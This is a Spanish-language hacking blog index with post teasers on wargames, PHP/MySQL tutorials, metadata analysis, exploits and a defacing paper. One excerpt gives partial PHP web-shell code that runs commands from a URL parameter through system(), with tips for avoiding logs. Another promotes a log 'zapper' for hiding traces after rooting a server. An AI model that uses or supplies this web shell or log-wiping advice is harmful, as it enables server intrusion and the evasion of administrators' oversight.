AdminPanel Finder [PHP]

Hola amigos. Espero estén bien comparto esta herramienta que programé hace un rato. se trata de un admin panel finder; tiene pocos paneles, pero le podrán ir añadiendo como vallan sabiendo de más y asi mejorandola! Espero les guste. Código Si se cae publiquenlo aquí y vuelvo a subir. Salu...

Read More

Analisis de Metadatos con FOCA

Buenas! , en esta ocasión vengo a traerles una presentación.odp sobre Analisis de Metadatos con FOCA y como burlar FOCA. Me toco realizar una charla sobre Analisis de Metadatos y use esta presentación como guia para realizar una demostración en directo sobre "Ataque y Defensa". La presentación esta hecha a prueba de Kiddies por lo qué cualquiera pueda aprender. Esta se hizo con la intención de hacerme de GUIA mientras iva explicando y haciendo...

Read More

MongoDB - La Mysql del NoSQL

Buenas , no hace mucho me hicierón una propuesta para trabajar como backend y requerian de conocimientos en bases de datos NoSQL, así que como buen autodidacta me puse a googlear y me encontre con la MySQL de las bases de datos no relacionales. Esta se llamaba MongoDB y con tan solo leer sus características me dejo totalmente enamorado. Índice :     {1} Introducción:         1-¿Qué es MongoDB?    ...

Read More

Exploits privados de 1337day.com

____ _ _ _____ _ _ _ | _ \ _ __(_)_ ____ _| |_ ___ | ____|_ ___ __ | | ___ (_) |_ ___ | |_) | '__| \ \ / / _` | __/ _ \ | _| \ \/ / '_ \| |/ _ \| | __/ __| | __/| | | |\ V / (_| | |_ __/ | |___ > <| |_) | | (_) | | |_\__ \ |_| |_| |_| \_/ \__,_|\__\___| |_____/_/\_\ .__/|_|\___/|_|\__|___/                                    ...

Read More

Wargame RCE

Hola amigos. esta tarde tenia un poc de tiempo así que me puse a programar un reto de RCE. Objetivo: El objetivo es lograr ejecutar un comando en el servidor (Linux) ¿Qué comando? No se puede decir que comando ya que si lo digo seria demaciado facil. Pista: Tiene que ver con el procesador. Link de el wargame Publicar sus respuestas. Salud...

Read More

Wargame XSS

Hola amigos.Tiempo sin programar algún wargame, Bien este consiste en lograr sacar una alerta (El XSS esta simulado).pero cuando logres el vector correcto te dirá que pasaste la prueba así que... ¡SUERTE! Link Publiquen sus fotos aquí en la entrada. Salud...

Read More

Creando un minibackdoor en PHP

Hola amigos, hoy explicaré como backdorizar una web. Es decir como crear un archivo que ejecute comandos, ya sea en linux o windows (Depende que servidor sea). Esto es más seguro ya que solo deja 1 log y si lo haces con metodo POST no deja logs. El codigo seria así: <form method="GET" action="lol.php"> <input type="text" name="comando"> <input type="submit" value="ejecutar"> <?php if(isset($_GET['comando'])); { $lol = @system($_GET['comando']); echo...

Read More

Wargame: Consigue el etc/passwd con LFI

Hola amigos. hace mucho no creo un wargame y pues bueno les dejo este:Consiste en poner en el formulario de texto los directorios a subir para logar sacar el LFI (Es una simulacion)Cuando saquen el LFI les satara una alerta diciendo que has pasado el wargame)Debes tomar foto a esa alerta y publicarla en esta entrada ó en el post correspondiente de underc0de (Ver post)Espero les guste. Link del wargame Salud...

Read More

Entrevista a Moften.

Estamos con @Moften. Programador, Developer, Pentester, auditor, Entre otras muchas cosas. Nos hablara sobre sus mas grandes experiencias y proyectos...

Read More

Generador de index basicos HTML By Okol

Hola amigos espero tengan buena tarde. Hace rato me puse a programar un generador de index en html (Esta basico aún) Espero les guste. Acepto criticas reportes de fallos & Ideas que me propongan para agregarle Sin mas que decir les dejo el Url Para que descarguen el Source: [100% By Okol] Descargar! Saludos! O...

Read More

Guardar información en una Database con PHP By Okol

Hola amigos, les explicare como guardar la información en una DB Mysql con PHP. Bien comenzamos. Ya sabemos conectarnos a nuestro servidor y seleccionar la Base de datos a la que enviaremos información. Ahora para guardar datos. Usaremos "INSERT INTO" ¿Como? Bueno, ya tenemos creada nuestra DB y nuestra tabla tambien, ya estamos conectados a el servidor y tenemos la base de datos seleccionada...

Read More

Zapper Para Borrar logs [Perl]

Hola amigos, Les vengo a dejar esta tool que tenia guardada por ahí y bueno se trata de un Zapper ¿Para Qué Sirve? Bueno sirve para borrar los logs un ejemplo puede ser cuando rooteamos un servidor para evitar dejar rastro usa un zapper. Codigo...

Read More

Underc0de Mailer By Okol.

¡Hola amigos! Les traigo un mailer que me puse a practicar con el. No es un mailer PRO (ya que lo cree en 10 minutos) Solo para probar. Les dejo el código de fuente.....

Read More

Conectando con servidor Mysql y seleccionando una DB con PHP

Hola, bueno soy Okol , Bueno para empezar a postear algo sobre programación [PHP], Es un tema que muchos me han pedido y bueno empezemos:Explicare como Conectarnos a un servidor y como seleccionar la base de datos para almacenar los mismos!Empezamos: ¿Que servidor usaremos? Yo usare localhost (En mi caso es Appserv) Pero pueden usar otros como xampp Bueno Después procederemos a Poner nuestra conección a el servidor así: <?PHP $con=mysql_connect("Servidor","Usuario de el servidor","password")or die(mysql_error());//Conectando...

Read More

Paper Defacing By Okol

Hola amigos, vengo enseñándoles un paper que creé hace tiempo. Se trata de defacing (Basico). Incluye los temas: Rfi (REMOTE FILE INCLUSION)Lfi ( LOCAL FILE INCLUSION)      Xss (CrosS Site Scripting)Symlink con la tool (EN PHP ) Autor: Okol                                                  &nbs...

Read More

Bienvenidos.

Hola amigos soy Okol. Usaré esta dirección de blogger. Este proyecto nació hace algunos 2 meses, Pero nunca le había puesto atención. Ahora que ya estoy disponible para publicar entradas muy seguido y poder enseñar a los que siguen este blog. A todos los lectores déjenme decirles GRACIAS. ¿Por Qué? Por dedicar su tiempo leyendo mis entradas que con mucho gusto estaré publicando para todos y cada uno de ustedes. Dejare mis datos en esta entrada por cualquier cosa que necesiten díganmelo con TODA Confianza y así todos...

Read More